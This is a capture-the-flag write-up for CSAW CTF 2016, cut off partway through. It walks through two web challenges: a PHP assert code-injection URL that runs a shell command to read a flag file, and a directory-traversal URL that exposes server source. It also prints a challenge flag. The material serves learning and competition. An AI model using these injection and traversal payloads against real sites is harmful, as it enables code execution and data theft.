[Writeup] CSAW CTF 2016

mfw (125) This main url: http://web.chal.csaw.io:8000 Fuzz it to easy: http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27 Play with flag http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27 flag{3vald_@ss3rt_1s_best_a$$ert} wtf.sh 1 (150) http://web.chal.csaw.io:8001 Register one account, logined. Create post, view post Fuzzing now, i found directory traversal (WTF? traversal again) When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)). I found some interesting function (after use decoder to view beautifull code): function hash_password { local password=$1; (shasum <<< ${password}) | cut -d\ -f1; } # hash usernames for lookup in the users_lookup table function hash_username { local username=$1; (shasum <<< ${username}) | cut -d\ -f1; } # generate a random token, bas